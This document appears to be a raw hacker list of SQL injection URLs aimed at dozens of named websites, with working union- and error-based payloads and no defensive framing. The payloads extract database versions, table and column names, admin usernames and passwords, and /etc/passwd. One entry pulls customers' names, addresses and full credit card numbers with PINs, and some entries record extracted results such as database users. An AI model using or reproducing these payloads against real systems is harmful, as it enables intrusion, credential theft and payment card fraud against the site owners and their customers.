familyrapp.com PR 4 http://www.familyrapp.com/Results/recipe_book_category_results_review.asp?BookID=1508+or+1=@@version (2000 branch, no xml raw support) http://www.familyrapp.com/Results/recipe_book_category_results_review.asp?BookID=1508+or+1=(select+top+1+username+from+login+where+username+not+in+(select+top+0+username+from+login)) (users) http://www.familyrapp.com/Results/recipe_book_category_results_review.asp?BookID=1508+or+1=(select+top+1+password+from+login+where+password+not+in+(select+top+0+password+from+login)) (passwords)
_http://fmv.bz/jp/item.php?i=-24+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),user(),database()),10,11,12-- 5.0.51a-log:[email protected]:sddb0025016300
indusites.com http://indusites.com/press/press-release-details.asp?id=141+or+1=@@version (2005 branch) http://indusites.com/press/press-release-details.asp?id=141+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+(select+top+9+table_name+from+information_schema.tables)) (the table we need) http://indusites.com/press/press-release-details.asp?id=141+or+1=(select+top+1+column_name+from+information_schema.columns+where+table_name='tblAdmin'+and+column_name+not+in+(select+top+0+column_name+from+information_schema.columns+where+table_name='tblAdmin'+group+by+column_name)+group+by+column_name+for+xml+raw) (enumerating the columns) http://indusites.com/press/press-release-details.asp?id=141+or+1=(select+quotename(username%2B':'%2Buserpassword)+from+tblAdmin) (admin login and password) http://indusites.com/admin/ (the admin panel itself)
http://ichep04.ihep.ac.cn/db/abs_cont1.php?session_no=3&id=-548+union+select+1,unhex(hex(concat_ws(0x3a,user,password))),3,4,5,6,load_file('/etc/passwd'),8,9,0,11,12,13,14,15,16,17,18,19+from+mysql.user--
HTML: http://www.kimallansilk.com/productdetail.php?proid=-1+union+select+1,2,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),4,5,6,7,8,9,10,11+from+information_schema.tables+limit+0,1-- HTML: http://www.forest-products.co.uk/products.php?id=-181+UnIon+selECt+1,2,3,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),5,6,7,8,9,10+from+information_schema.tables+limit+0,1--
http://www.pricon.co.in/newsview.php?newsid=7+and+1=0+union+select+1,2,concat_ws(0x3a,user,password,host,file_priv),4,5,6,7,8+from+mysql.user http://www.pricon.co.in/newsview.php?newsid=7+and+1=0+union+select+1,2,load_file(0x2f6574632f706173737764),4,5,6,7,8
HTML: http://www.boredatuni.com/stuff.php?stuffId=-73+union+select+1,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),3+from+information_schema.tables+limit+0,1-- HTML: http://www.toonecards.com/view-free-stuff.php?id=-20+UnIon+selECt+1,2,3,4,5,6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20+--+ HTML: http://www.sandwichbau.de/newsview.php?newsid=-118+UnIon+selECt+1,2,3,4,5,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),7,8,9,10,11+from+information_schema.tables+limit+0,1-- HTML: http://www.antoniandalison.co.uk/shop.php?category=-4+union+select+1,aes_decrypt(aes_encrypt(group_concat(table_name),1),1)+from+information_schema.tables+limit+0,1-- HTML: http://www.griefencounter.org.uk/shop.php?ShopID=-5+union+select+1,version(),3,4--+ HTML: http://www.skye.co.uk/local-media-shop.php?catid=-14+union+select+1,2,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),4,5,6+from+information_schema.tables+limit+0,1-- HTML: http://www.brokenpencil.com/view.php?id=-5392+UnIon+selECt+1,2,3,4,5,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),7,8,9,10,11,12+from+information_schema.tables+limit+0,1-- HTML: http://www.31girl.com/shop.php?pid=-1+union+select+1,2,3,4,concat_ws(0x3a,FirstName,LastName,ShippingAddress,Country,City,State,Zip,Email,Phone,CreditCardType,CreditCardNumber,CreditCardName,CreditCardExpiryDate,CreditCardPinNumber),6,7,8+from+shop_orders--
http://www.alcobex.com/newsview.php?newsid=-11+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10-- (output in the title) http://www.sandwichbau.de/newsview.php?newsid=-85+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10,11-- http://snow-country.jp/festival/contents.php?id=-10+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4--
http://www.job-passport.com/en/activity_detail.php?actid=-21%20union%20select%201,2,3,4,version(),6,7,8,9,10,11,12 -- did not find the admin panel ver:5.0.77 datadir:/var/lib/mysql/ base:jobpass_test tmpdir:/tmp/ user:jobpass@localhost os:redhat-linux-gnu basedir:/usr/
http://www.povareschka.ru/prod.php?id=4+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables+--&sort=9 tables: administrator, user --------------------------------------------------- http://www.ucamind.com/prod.php?id=4+union+select+1,group_concat(0x0b,id,0x3a,username,0x3a,password),3,4,5,6,7,8+from+adminlogin+--
http://www.maind.com/catalog/add2cart.asp?id=-26+union+select+1,2,3,4,5,concat_ws(0x3a,database(),user(),version()),7,8,9,10,11,12,13,14,15,16,17 http://www.maind.com/catalog/add2cart.asp?id=-26+union+select+1,2,3,4,5,concat_ws(0x3a,username,password),7,8,9,10,11,12,13,14,15,16,17+from+admin
http://www.npomagr.ru/prod.php?id=4+union+select+1,2,3,concat_ws(0x3a,ID,Name,Password),5,6+from+_magr_users--
http://www.breedjewelry.com/view_detail.asp?id=395+or+1=@@version-- http://www.breedjewelry.com/view_detail.asp?id=395+or+1=(select+top+1+quotename(userid%2B':'%2Bpassword)+from+admin)--
HTML: http://www.walkerbooks.com/books/catalog.php?key=-883+UnIon+selECt+1,2,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables+limit+0,1-- HTML: http://museummasterworks.com/Catalog.php?page=-3+UnIon+selECt+1,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),3,4+from+information_schema.tables+limit+0,1-- HTML: http://www.southiceland.com/main.php?cat=-2+UnIon+selECt+1,2,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),4,5,6,7,8,9+from+information_schema.tables+limit+0,1--
christianactivities.com PR 5 http://www.christianactivities.com/artistupdates/story.asp?ID=-4308+union+select+concat_ws(0x3a,user(),version(),database()),2,3,4,5,6,7,8,9,10,11,12-- http://www.soupbase.com/view.asp?cid=2706+or+1=@@version http://wecsa.co.za/squadupdates.asp?id=1+or+1=@@version
http://www.thesame-innovation.com/Thesame/Prod/Prod.php?Id=-4+union+select+1,group_concat(0x0b,Id_Admin,0x3a,Titre_Admin,0x3a,Pass_Admin),3,4,5+from+Admin+--
gmvnl.com PR - 6 http://www.gmvnl.com/newgmvn/updates/updates.asp?id=12+or+1=(select+system_user)-- http://www.mrtoys-games.com.au/Store_details.asp?ID=6+or+1=@@version
http://support.optis-world.com/press_release_details.asp?Product_id=12281+or+1=@@version http://www.hirestrategy.com/articles/feature_content.asp?ID=56+or+1=@@version http://www.mrsfixit.com/fixits/FixitCategoryList.asp?id=69+or+1=@@version
http://www.che-esche.ru/posts.php?id=-100+union+select+1,2,3,4,group_concat(TABLE_NAME),6,7,8,9+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,10+--+ table users_tbl http://www.che-esche.ru is the same as http://www.che-esche.com